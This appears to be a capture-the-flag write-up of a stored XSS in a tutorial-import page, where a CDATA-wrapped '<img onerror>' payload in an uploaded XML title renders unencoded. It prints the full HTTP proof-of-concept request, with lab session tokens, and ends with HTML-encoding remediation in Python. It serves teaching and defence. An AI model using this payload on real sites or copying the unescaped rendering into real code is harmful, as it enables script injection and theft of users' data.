
XSS from Tutorial Title


Description

Write-up: Guillaume
Creator: WOCSA
Difficulty: Unknown


Statement

Cross-site scripting (XSS) vulnerabilities occur when:

- Untrusted data enters a web application, typically from a web request.
- The web application dynamically generates a web page that contains this untrusted data.
- During page generation, the application does not prevent the data from containing content that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes, mouse events, Flash, ActiveX, etc.
- A victim visits the generated web page through a web browser, which contains malicious script that was injected using the untrusted data.
- Since the script comes from a web page that was sent by the web server, the victim's web browser executes the malicious script in the context of the web server's domain.
- This effectively violates the intention of the web browser's same-origin policy, which states that scripts in one domain should not be able to access resources or run code in a different domain.


Detailed solution

Exploitation

Create a new template on http://wg2d3m2w.3xploit.me/import_tutorial/ by uploading an XML file in which the title is wrapped in a CDATA section. The XML parser passes the CDATA contents through verbatim, so an XSS payload placed there is rendered unencoded on the page.

POC

Host: wg2d3m2w.3xploit.me
User-Agent: PENTEST-BSECURE
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: http://wg2d3m2w.3xploit.me/import_tutorial/
Content-Type: multipart/form-data; boundary=---------------------------425632754830607821922911679252
Content-Length: 1342
Origin: http://wg2d3m2w.3xploit.me
Connection: keep-alive
Cookie: logs="gASVQgAAAAAAAACMFWJsb2dfRElZLmxvZ3NfbWFuYWdlcpSMBExvZ3OUk5QpgZR9lCiMCHVzZXJuYW1llIwDVG9HlIwDbG9nlIh1Yi4="; csrftoken=dbLj5tn4iA38ZElYBwppgECwbD1QIWpy; jwt_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0b2tlbl90eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzE0ODk1MDAyLCJpYXQiOjE3MTQ4MDg2MDIsImp0aSI6Ijg0Mjc2NWFlMTk4YzRhNWM5MWQxYWRlODgxNTMyMzA4IiwidXNlcl9pZCI6OX0.hq5DNxuKmZubSjUCyeGd0YOsk3kOkKHDNDaASGW4rVo
Upgrade-Insecure-Requests: 1
X-PwnFox-Color: green
Pragma: no-cache
Cache-Control: no-cache

-----------------------------425632754830607821922911679252
Content-Disposition: form-data; name="csrfmiddlewaretoken"

FIprmO4eMUtL3Oj855LWa51ExsASmuxmIJ0Ah7h8UkmJSiuWwr0bgzt0yVryUgMK
-----------------------------425632754830607821922911679252
Content-Disposition: form-data; name="file"; filename="sploi.xml"
Content-Type: text/xml

<tutorial>
    <title><![CDATA[<img src=x onerror=alert(1)>>]]></title>
    <text_contents>
    </text_contents>
    <picture_contents>
        <picture_content>
            <picture>example.jpg</picture>
        </picture_content>
        <picture_content>
            <picture>another_example.jpg</picture>
        </picture_content>
    </picture_contents>
</tutorial>

-----------------------------425632754830607821922911679252--

Risk

XSS can be used to deface the site, to deny service via cookie bombing, and to steal user data.

Remediation

HTML-encode (or sanitize) the values extracted from the XML before rendering them in the page.
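To show why the CDATA title reaches the browser intact and what the remediation changes, here is an added Python example (not code from the challenge or from this write-up). It parses a constructed copy of the uploaded tutorial file with the standard-library XML parser, then renders the title once the vulnerable way (plain concatenation into the page markup) and once with HTML encoding; the function names and the page template are assumptions for illustration.

```python
import html
import xml.etree.ElementTree as ET

# Constructed sample mirroring the uploaded file: an HTML payload wrapped in
# a CDATA section inside <title>.
SAMPLE_XML = """<tutorial>
    <title><![CDATA[<img src=x onerror=alert(1)>>]]></title>
    <text_contents>
    </text_contents>
    <picture_contents>
        <picture_content>
            <picture>example.jpg</picture>
        </picture_content>
    </picture_contents>
</tutorial>"""


def parse_title(xml_text: str) -> str:
    """Return the text of <title>. The XML parser hands CDATA content back
    verbatim, so the HTML payload survives parsing untouched."""
    root = ET.fromstring(xml_text)
    title = root.findtext("title")
    return title if title is not None else ""


def render_title_unsafe(xml_text: str) -> str:
    """The pattern that produces the XSS (hypothetical page template): the
    parsed title is concatenated into the markup without encoding."""
    return "<h1>" + parse_title(xml_text) + "</h1>"


def render_title_safe(xml_text: str) -> str:
    """Remediated version: every character significant to HTML is encoded
    before the value reaches the page, so the browser displays the payload
    as text instead of executing it."""
    return "<h1>" + html.escape(parse_title(xml_text), quote=True) + "</h1>"


if __name__ == "__main__":
    print("parsed title :", parse_title(SAMPLE_XML))
    print("unsafe render:", render_title_unsafe(SAMPLE_XML))
    print("safe render  :", render_title_safe(SAMPLE_XML))
```

The encoding step belongs at the point of output, not at import time: storing the raw title and escaping it whenever it is placed in HTML keeps the stored data intact and covers every template that displays it. In Django, autoescaping in templates does this by default, so the bug only appears where a value is marked safe or concatenated into HTML by hand.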